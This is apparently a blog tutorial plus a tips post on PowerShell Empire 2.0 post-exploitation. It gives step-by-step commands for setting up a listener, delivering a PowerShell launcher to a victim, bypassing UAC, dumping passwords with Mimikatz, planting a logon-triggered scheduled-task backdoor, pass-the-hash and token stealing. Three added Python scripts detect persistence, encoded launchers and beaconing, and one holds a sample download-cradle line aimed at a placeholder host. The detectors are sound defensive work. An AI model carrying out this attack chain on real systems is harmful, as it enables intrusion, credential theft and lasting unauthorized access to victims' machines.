Empire

POST-EXPLOITATION WITH POWERSHELL EMPIRE 2.0

Welcome to this exciting tutorial about the new Empire version 2.0.

I’m pretty sure you’re curious and want to learn how to use it. In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

Let’s see together the workflow that I’ll be using for this demo.

First, I will show you how to install Empire.

Second, you will learn how to create a listener. If you are not sure what a listener is, its name explains what it does: the listener waits for incoming connections from infected victims.

Next, I will show you how to create a PowerShell script with Empire's launcher to send to your victim.

When the victim executes the script, the machine connects back to the listener, and this creates an agent representing the victim machine.

All we need at this stage is to interact with the agent and escalate our privileges so that we become some sort of admin. Why? Because with admin privileges I can show you how to run Mimikatz, for example, to extract the victim's passwords.

Finally, I will make sure that you learn how to create a persistent backdoor so you can go back anytime you want.

Before I start this Demo, I want to let you know that this blog has a video demo on youtube:

Let’s start the action!

First, open your browser and go to the Empire GitHub website and click on the “Clone or download” button to copy the URL to your clipboard.

Now open your terminal window, run git clone and paste the URL:

$ git clone https://github.com/EmpireProject/Empire.git
This clones the application into my home directory on Kali Linux.

$ ls
Let’s explore this new folder.

$ cd Empire
If I check the contents of the Empire directory I can see the setup folder.

$ cd setup
Now I'm pretty sure that our installer is somewhere in here.

$ ls
Here it is: the install.sh file.

Let’s give it the right permission and execute it to install Empire.

$ chmod +x install.sh
$ ./install.sh
The installation is going to take some time, so be patient. After a while the installer will ask you to enter a password or press Enter to generate a random one; I'm going to press Enter, and we're done!

I will go up one directory to execute the empire application, but before doing that I will give it the right permission as well.

$ cd ..
$ ls
$ chmod +x empire
Perfect, it's time to execute this monster.

$ ./empire

Voilà! This is the Empire home screen. As you can see we have 267 modules ready to be used, and no listeners or agents, which is normal because it's a fresh copy of Empire.

Let's start by creating a listener. Type listeners:

$> listeners
and you will get this message:

[!] No listeners currently active
Wait, this is not an error message. Check the prompt: it has changed to the listeners menu.

Next, I will choose the HTTP-based listener, so type:

$> uselistener http
The prompt changes to the http listener context. Alright, it's time to execute it:

$> execute
Amazing! We should have an active listener at this point.

$> listeners
Here in the details it shows that the name of this listener is http and that it's listening on port 80 on my Kali Linux machine.

If we want to change listener options, for example the host and port:

(Empire: listeners/http) > set Host 192.168.178.16:443
(Empire: listeners/http) > set Port 443
(Empire: listeners/http) > 

At this stage we need to create a launcher. Type launcher in the terminal window and you get a message:

Following that message, let's generate a PowerShell script for the listener named http:

$> launcher powershell http

Perfect, let's copy this PowerShell script so it's ready for our Windows 7 machine.

I will open a new terminal window and use a remote desktop client to connect to the victim machine: -u is for the user name, -p is for the password, followed by the IP address of the Windows 7 host.

Let's open a command prompt in Windows and paste the PowerShell script.
Beautiful! Let's go back to the Empire terminal window: we have an active agent.

Type back to return to the main menu.

$> back

Here, type agents to list the available agents.

We can see all the information that represents our Win7 machine, but the name is very random, so I will rename it to something more meaningful.

Type rename followed by the first two letters of the agent name, press Tab to auto-complete it, then type the desired new name.

$> rename [old name] [new name]
To list the agents at this stage, type list:

$> list

And there it is, our new name for the Windows 7 agent.

Let's interact with this agent:

$> interact [agent name]

Then type info to see the essential information about it:

$> info
Pay attention here: high integrity is set to 0, because we are not an admin. The next step is to elevate our privileges. We can become an admin with a single command, bypassuac, followed by the name of the listener:

$> bypassuac http

Wait a couple of seconds and you should see some output arrive: we have a new agent.

Press Enter, go back and run the list command to see the new agent:

$> [enter]
$> back
$> list
Notice the difference: there is an asterisk before the username, which means this is an elevated (high integrity) agent. Let's rename this new agent:

$> rename [old name] [new name]
Let’s start interacting with this new agent.

$> interact [agent name]
$> info

Note that high integrity is now 1 instead of 0.

Perfect, let's run Mimikatz to extract the clear-text passwords. But first, type creds to list the credential store; for now it's empty:

$> creds

Next, run mimikatz and wait a few seconds for it to finish:

$> mimikatz

Awesome! Let's look at the credential list again, and there you go: all the passwords have been extracted for us.

$> creds

It's time for our final stage: backdoor persistence. If you're ever lost in this application, you can always type the help command to see the available choices:

$> help

To create a persistent backdoor I will use the schtasks persistence module in Empire:

$> usemodule persistence/elevated/schtasks

Let's check its options. I will set onLogon to True because I want it to execute every time the victim user logs on to this machine, and set the listener name to http.

And finally execute it:

$> info
$> set onLogon True
$> set Listener http
$> execute

And we now have a persistent backdoor. A big success!

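From the defender's side, the schtasks module run above leaves a scheduled-task creation behind, and a task that fires at logon, runs as SYSTEM and launches a hidden, encoded PowerShell is a strong persistence signal. The following Python triage is an added example, not Empire's own code: it parses constructed schtasks.exe command lines (an assumption about what your process-creation telemetry gives you) into switches and values, scores the persistence-shaped ones, and ignores queries and ordinary maintenance tasks. The task names, paths and the Base64 placeholder are constructed.

```python
"""Spot scheduled tasks that look like logon-triggered persistence.

Added example for this page; not part of Empire. Input is a list of
schtasks.exe command lines (constructed samples below; assumption: your
EDR/Sysmon feed provides the CommandLine of each schtasks.exe process).
"""
import re

# Switches that take a value in "schtasks /create" syntax
VALUE_SWITCHES = {"/tn", "/sc", "/tr", "/ru", "/rp", "/st", "/sd", "/ed", "/mo",
                  "/d", "/m", "/i", "/rl", "/ri", "/du", "/et", "/xml", "/s", "/u", "/p"}

# Constructed samples: one persistence-shaped creation, one nightly backup,
# one query, one logon-triggered but benign-looking cleanup task.
SAMPLE_CMDLINES = [
    'schtasks.exe /create /f /tn "Updater" /sc onlogon /ru SYSTEM '
    '/tr "powershell -noP -w 1 -enc <BASE64_PLACEHOLDER>"',
    'schtasks.exe /create /tn "Nightly Backup" /sc daily /st 02:00 /tr "C:\\Tools\\backup.exe /full"',
    'schtasks.exe /query /tn "Updater"',
    'schtasks.exe /create /tn "Cleanup" /sc onlogon /tr "C:\\Windows\\System32\\cleanmgr.exe /sagerun:1"',
]

def tokenize(cmdline):
    """Keep double-quoted arguments together (Windows style) and drop the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def parse_schtasks(cmdline):
    """Return {'options': {switch: value}, 'flags': {bare switches}} or None."""
    toks = tokenize(cmdline)
    if not toks or "schtasks" not in toks[0].lower():
        return None
    opts, flags = {}, set()
    i = 1
    while i < len(toks):
        t = toks[i].lower()
        if t in VALUE_SWITCHES and i + 1 < len(toks):
            opts[t] = toks[i + 1]
            i += 2
        else:
            flags.add(t)
            i += 1
    return {"options": opts, "flags": flags}

def score_task(parsed):
    """Count persistence indicators; each reason adds one point."""
    if parsed is None or "/create" not in parsed["flags"]:
        return 0, []
    o = parsed["options"]
    reasons = []
    trigger = o.get("/sc", "").lower()
    if trigger in ("onlogon", "onstart"):
        reasons.append("trigger=" + trigger)
    if o.get("/ru", "").lower() in ("system", "nt authority\\system"):
        reasons.append("runs as SYSTEM")
    action = o.get("/tr", "").lower()
    if "powershell" in action:
        reasons.append("action runs powershell")
        if re.search(r"-(?:e|enc|encodedcommand)\b", action):
            reasons.append("encoded command")
        if re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)|-nop\b|-noprofile\b", action):
            reasons.append("hidden/no-profile window")
    if "/f" in parsed["flags"]:
        reasons.append("forced overwrite")
    return len(reasons), reasons

def find_persistence(cmdlines, threshold=3):
    """Return the command lines scoring at or above threshold with their reasons."""
    hits = []
    for c in cmdlines:
        score, why = score_task(parse_schtasks(c))
        if score >= threshold:
            hits.append({"cmdline": c, "score": score, "reasons": why})
    return hits

if __name__ == "__main__":
    for hit in find_persistence(SAMPLE_CMDLINES):
        print(hit["score"], hit["reasons"])
        print("  ", hit["cmdline"])
```

The threshold of three keeps a plain logon-triggered task (one point) out of the alert queue while the combination of logon trigger, SYSTEM account and a hidden encoded PowerShell action scores six. Tasks created through the Task Scheduler API rather than schtasks.exe do not produce a schtasks command line, so pair this with Security event 4698 (task created) in a real deployment.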
Thank you for reading this tutorial. I hope that you liked it, until the next time!

Empire Tips and Tricks

Since the release of Empire at BSides Las Vegas, the project has received a lot of great feedback and use cases. While @harmj0y, @sixdub and myself worked really hard on documenting all of Empire's features, there are a few tips and tricks that weren't documented that can be of use. I wanted to cover some additional Empire functionality so you can get the most out of the framework.

Generating a Launcher

Empire stagers are the various methods you can use to trigger Empire agents on systems. The 'launcher' format generates the plain PowerShell one-liner that starts the staging process, and it is the one we commonly use in engagements as well as in testing. If you simply need the PowerShell one-liner, type "launcher <listenerName>" from the listener menu and it will quickly generate the one-liner for you. The listener names are tab-completable.

[Screenshot: empire_stager_listener]

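Both the tutorial's launcher powershell step and the launcher described here produce the same artifact on the endpoint: a powershell.exe process whose command line carries the script as a Base64-encoded, UTF-16LE blob behind -enc. The Python below is an added example, not Empire's or the authors' code. It walks constructed process-creation events (an assumed key=value format with a quoted CommandLine field), decodes any -enc blob, and scores launcher-like flags plus download-cradle tokens so that a hidden, encoded one-liner ranks far above a scheduled backup script. The script text, paths and hostname in the samples are constructed.

```python
"""Triage process-creation events for encoded PowerShell launchers.

Added example for this page; not Empire's code. The events below are
constructed samples in a simplified key=value form with a quoted
CommandLine field (an assumption; map your Sysmon/EDR fields onto it).
"""
import base64
import re

def encode_command(script):
    """Build the Base64(UTF-16LE) form that -EncodedCommand / -enc expects.
    Used here only to construct the sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample script: a generic download cradle, used only as test data.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://listener.example/')"

SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c dir" '
    'ParentImage=C:\\Windows\\explorer.exe',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -noP -sta -w 1 -enc ' + encode_command(SAMPLE_SCRIPT) + '" '
    'ParentImage=C:\\Windows\\System32\\cmd.exe',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -NoProfile -File C:\\scripts\\backup.ps1" '
    'ParentImage=C:\\Windows\\System32\\svchost.exe',
]

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Flags that hide the window or skip profile/interaction: common in launchers,
# but also in legitimate automation, so each one only adds a point.
HIDDEN_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+(?:1|hidden)|nop(?:rofile)?|noni(?:nteractive)?|sta)\b", re.I)
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "net.webclient", "frombase64string")

def decode_encoded_command(b64):
    """Return the UTF-16LE script behind an -enc blob, or None if it is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(line):
    """Score one event: 2 for an encoded command, 1 per hiding flag,
    2 per cradle token found in the decoded script (or the raw command line)."""
    m = re.search(r'CommandLine="([^"]*)"', line)
    cmd = m.group(1) if m else ""
    result = {"command": cmd, "encoded": False, "decoded": None, "hits": [], "score": 0}
    if "powershell" not in cmd.lower():
        return result
    enc = ENCODED_FLAG.search(cmd)
    if enc:
        result["encoded"] = True
        result["score"] += 2
        result["decoded"] = decode_encoded_command(enc.group(1))
    result["hits"] = [h.group(0) for h in HIDDEN_FLAGS.finditer(cmd)]
    result["score"] += len(result["hits"])
    body = (result["decoded"] or cmd).lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t in body]
    result["hits"] += tokens
    result["score"] += 2 * len(tokens)
    return result

def triage(events, threshold=3):
    """Events scoring at or above threshold, highest first."""
    flagged = [r for r in map(analyze_event, events) if r["score"] >= threshold]
    return sorted(flagged, key=lambda r: r["score"], reverse=True)

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["score"], r["hits"])
        print("  decoded:", r["decoded"])
```

Decoding is the part that matters: a rule that only matches "-enc" fires on every signed deployment script that uses it, while the decoded body is where IEX and DownloadString become visible. The encoded sample scores 11 and the -NoProfile backup script scores 1, so a threshold of 3 separates them without an allow-list.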
Renaming Agents

After receiving agents, there are also a few shortcuts that will help you with shell management. When an agent comes in, it will always have a randomized name. Since this can make agent identification difficult, Empire allows you to rename agents using "rename <oldAgentName> <newAgentName>" from the agents menu:

[Screenshot: empire_full_rename]

Alternatively, you can do this within the context of an agent by typing “rename <newName>”.

[Screenshot: empire_quick_rename]
Stale Agents

When dealing with multiple agents, determining which ones are active and which ones have died can be accomplished by typing “list stale” in the agents menu. This will list any agents that are no longer active.

[Screenshot: empire_list_stale]
You can then remove all stale agents by typing “remove stale”:

[Screenshot: remove_stale]

You can also list any agents that haven't checked in in a period of time by typing "list X", where X is the minute window for the agent check-in. For example, "list 5" will list all agents that have called back in the last 5 minutes.

[Screenshot: empire_list_minutes]
Mass Agent Configuration Changes

Empire also allows for basic configuration changes to multiple agents at once. You can accomplish this by typing “<command> all <parameter>”. For example, you can set the sleep for all agents to “0” by typing “sleep all 0”:

[Screenshot: mass_agent_command]
Process Listing

When searching for a specific process, Empire allows you to specify a process name with the “ps” command. To search for a specific process, you can simply type “ps <ProcessName>” to list all processes that contain that name.

[Screenshot: process_listing]
High Integrity Agents*

Several Empire modules require a high integrity context in order to perform certain post-exploitation actions. For example, Empire supports the use of Mimikatz to obtain credentials from memory. High integrity agents will always be identified by an asterisk (*) next to the UserName, and this information can also be seen by running info in an agent menu. You can check whether your current user is a local administrator in a medium integrity context (meaning a bypassuac attack should be run) by running the privesc/powerup/allchecks module.

[Screenshot: agent_admin]
The Credential Store

Empire will automatically scrape/parse Mimikatz output and throw the results into an accessible credential module that’s stored in the backend database. You can view the credentials by typing “creds”.

[Screenshot: empire_creds]
Searching the Credential Store

The credential store will hold both hash and plaintext credentials. Empire allows for you to search/filter the credential store, so if you are looking for specific users, you can type “creds <searchTerm>” to show all credentials matching that term.

[Screenshot: credential_search]

You can also filter by plaintext/hashes by typing “creds plaintext” (for all plaintext creds) or “creds hash” (for all hashes).

[Screenshot: cred_plaintext_hash_filter]
Adding Credentials to the Credential Store

If you have credentials that weren’t automatically added into the credential store, you can manually add them by typing “creds add <domain> <username> <password>”:

[Screenshot: cred_add]
Removing Credentials

You can also remove credentials from the credential store by typing “creds remove <credID>/<credID-credID>/all”. You can remove a single credential by specifying the CredID, remove a set of credentials by specifying the range of CredIDs, or you can remove all credentials by specifying “all”.

[Screenshot: cred_remove_set]
Exporting Credentials

Empire also allows you to export the credential store to a CSV. You can achieve this by typing “creds export <filePath>\file.csv”:

[Screenshot: cred_export]

[Screenshot: cred_csv]

Using CredIDs

Each set of credentials is assigned a unique CredID, and you can use this CredID within modules that require credentials:

[Screenshot: cred_id_module]

Alternatively, you can unset the CredID of a module by typing "unset CredID". "unset" can be used to clear any option that is set within a module: it clears out the value of the option specified.

You can also use the CredID with the "pth" command to execute the Mimikatz PTH module with the credentials in the credential store.

[Screenshot: pth_cred_id]
You can then use “steal_token <pid>” to steal the token of the newly generated process.

[Screenshot: steal_token]

Disaster Recovery

Sometimes things don't go your way. In the event of an Empire crash on the server side, you won't lose all of your access: the agents run in memory on the target and keep calling home, even if your listeners are down. Empire uses a backend database that preserves Empire's configuration (such as listeners). In the event of a crash, simply start Empire back up and wait for your agents to check back in:

[Screenshot: ctrl_c_quit]

[Screenshot: agent_recovery]
Once Empire fires back up, your agents will slowly begin to trickle back in. You can also manually browse the Empire database by opening SQLiteBrowser in Kali and pointing it at "/data/empire.db". This lets you see everything Empire retains in the backend database, as well as make changes:

[Screenshot: browse_db]
[Screenshot: db_listener_config]

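The "sleep" setting in the mass-configuration section and the recovery behaviour just described are two views of one property: an agent calls home on a fixed interval regardless of what the server is doing, which is exactly the regularity network defenders hunt for. The Python below is an added example, not Empire's or the authors' code. It reads a constructed proxy-log sample (assumed format: epoch, source, destination, path per line; addresses and path are constructed), groups requests per source/destination pair, and reports pairs whose inter-arrival times are nearly constant, measured as the coefficient of variation of the gaps. A small jitter is tolerated; a "sleep 0" agent simply shows up as a very short, very regular interval.

```python
"""Find hosts that call out to the same destination on a fixed schedule.

Added example for this page; not part of Empire. Input lines are
"epoch src dst path" (an assumed format; map your own proxy or firewall
fields onto it). All sample traffic below is constructed.
"""
import statistics
from collections import defaultdict

def make_sample_log():
    """Constructed log: one host beaconing every ~5 s with +/-0.3 s jitter,
    one host browsing a site at irregular times."""
    lines = []
    t = 1_700_000_000.0
    jitter = [0.1, -0.2, 0.3, 0.0, -0.1, 0.2, -0.3, 0.1, 0.0, -0.2, 0.3, 0.1]
    for j in jitter:
        t += 5.0 + j
        lines.append(f"{t:.1f} 10.0.0.7 192.0.2.10 /update")
    for dt in (1.0, 37.0, 2.5, 120.0, 9.0, 61.0, 4.0, 300.0):
        t += dt
        lines.append(f"{t:.1f} 10.0.0.8 198.51.100.5 /news")
    return lines

def parse_line(line):
    ts, src, dst, path = line.split(maxsplit=3)
    return float(ts), src, dst, path

def beacon_candidates(lines, min_events=8, max_cv=0.2):
    """Return (src, dst) pairs seen at least min_events times whose gap
    coefficient of variation (stdev / mean) is at or below max_cv."""
    by_pair = defaultdict(list)
    for line in lines:
        ts, src, dst, _ = parse_line(line)
        by_pair[(src, dst)].append(ts)
    findings = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < max(min_events, 3):   # need at least two gaps
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        if cv <= max_cv:
            findings.append({"src": src, "dst": dst, "events": len(stamps),
                             "interval": round(mean, 2), "cv": round(cv, 3)})
    return sorted(findings, key=lambda f: f["cv"])

if __name__ == "__main__":
    for f in beacon_candidates(make_sample_log()):
        print(f"{f['src']} -> {f['dst']}: {f['events']} requests every "
              f"~{f['interval']}s (cv={f['cv']})")
```

With the defaults the beaconing host is reported at roughly a 5 s interval with a coefficient of variation under 0.05, while the browsing host, despite having enough events, has a cv above 1 and is ignored. Agents configured with large jitter push the cv up, so in practice this check is paired with destination rarity and request-size uniformity rather than used alone.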
These are just a few tips and tricks that we often use when interacting with Empire.

Demos of Empire
BSIDES DC POWERSHELL EMPIRE DEMO

EMPIRE DCSYNC

BSIDES Las Vegas

Building an Empire with Powershell